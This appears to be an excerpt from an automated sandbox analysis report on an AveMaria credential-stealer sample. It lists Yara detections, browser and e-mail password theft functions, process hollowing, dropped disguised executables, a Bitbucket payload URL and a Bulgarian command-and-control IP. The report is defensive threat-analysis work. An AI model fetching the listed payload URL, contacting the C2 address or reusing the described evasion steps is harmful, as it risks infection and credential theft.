Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 10_2_004100DE
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Chromium\User Data\Default\Login Data 10_2_0040EC28
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 10_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 10_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 10_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 10_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 21_2_004100DE
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Chromium\User Data\Default\Login Data 21_2_0040EC28
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 21_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 21_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 21_2_00415CC4
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: \Google\Chrome\User Data\Default\Login Data 21_2_00415CC4
Contains functionality to steal e-mail passwords
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: POP3 Password 10_2_0040C8FC
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: SMTP Password 10_2_0040C8FC
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: IMAP Password 10_2_0040C8FC
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: POP3 Password 21_2_0040C8FC
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: SMTP Password 21_2_0040C8FC
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: IMAP Password 21_2_0040C8FC
Yara detected Credential Stealer
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qqig1mHX8U.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kwtqutrL.pif PID: 7052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lrtuqtwk.PIF PID: 6584, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kwtqutrL.pif PID: 6812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kwtqutrL.pif PID: 6956, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562868 Sample: qqig1mHX8U.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 60 s3-w.us-east-1.amazonaws.com 2->60 62 s3-1-w.amazonaws.com 2->62 64 2 other IPs or domains 2->64 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus / Scanner detection for submitted sample 2->84 86 12 other signatures 2->86 9 qqig1mHX8U.exe 1 7 2->9         started        14 Lrtuqtwk.PIF 2->14         started        16 Lrtuqtwk.PIF 2->16         started        signatures3 process4 dnsIp5 68 bitbucket.org 185.166.143.50, 443, 49711, 49712 AMAZON-02US Germany 9->68 70 s3-w.us-east-1.amazonaws.com 16.182.101.153, 443, 49713 unknown United States 9->70 48 C:\Users\Public\Libraries\kwtqutrL.pif, PE32 9->48 dropped 50 C:\Users\Public\Lrtuqtwk.url, MS 9->50 dropped 52 C:\Users\Public\Libraries\kwtqutrL.cmd, DOS 9->52 dropped 54 C:\Users\Public\Libraries\Lrtuqtwk, data 9->54 dropped 98 Contains functionality to hide user accounts 9->98 100 Drops PE files with a suspicious file extension 9->100 102 Writes to foreign memory regions 9->102 104 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->104 18 kwtqutrL.pif 3 2 9->18         started        22 cmd.exe 1 9->22         started        24 esentutl.exe 2 9->24         started        106 Antivirus detection for dropped file 14->106 108 Multi AV Scanner detection for dropped file 14->108 110 Machine Learning detection for dropped file 14->110 27 kwtqutrL.pif 14->27         started        112 Allocates memory in foreign processes 16->112 114 Sample uses process hollowing technique 16->114 116 Allocates many large memory junks 16->116 29 kwtqutrL.pif 16->29         started        file6 signatures7 process8 dnsIp9 66 87.120.125.217, 49714, 49720, 49722 UNACS-AS-BG8000BurgasBG Bulgaria 18->66 88 Detected unpacking (changes PE section rights) 18->88 90 Detected unpacking (overwrites its own PE header) 18->90 92 Found evasive API chain (may stop execution after checking mutex) 18->92 96 6 other signatures 18->96 31 esentutl.exe 2 22->31         started        35 alpha.pif 1 22->35         started        37 esentutl.exe 2 22->37         started        41 6 other processes 22->41 46 C:\Users\Public\Libraries\Lrtuqtwk.PIF, PE32 24->46 dropped 39 conhost.exe 24->39         started        94 Contains functionality to hide user accounts 27->94 file10 signatures11 process12 file13 56 C:\Users\Public\alpha.pif, PE32 31->56 dropped 74 Drops PE files to the user root directory 31->74 76 Drops PE files with a suspicious file extension 31->76 78 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 31->78 43 xpha.pif 1 35->43         started        58 C:\Users\Public\xpha.pif, PE32 37->58 dropped signatures14 process15 dnsIp16 72 127.0.0.1 unknown unknown 43->72
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
87.120.125.217
 unknown Bulgaria
25206 UNACS-AS-BG8000BurgasBG true
16.182.101.153
 s3-w.us-east-1.amazonaws.com United States
unknown unknown false
185.166.143.50
 bitbucket.org Germany
16509 AMAZON-02US false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
s3-w.us-east-1.amazonaws.com 16.182.101.153 true
bitbucket.org 185.166.143.50 true
bbuseruploads.s3.amazonaws.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://bitbucket.org/masterservicwes/mastermanservices/downloads/145_Lrtuqtwkqjp false
    		high
    87.120.125.217 true
    • Avira URL Cloud: safe
    		 unknown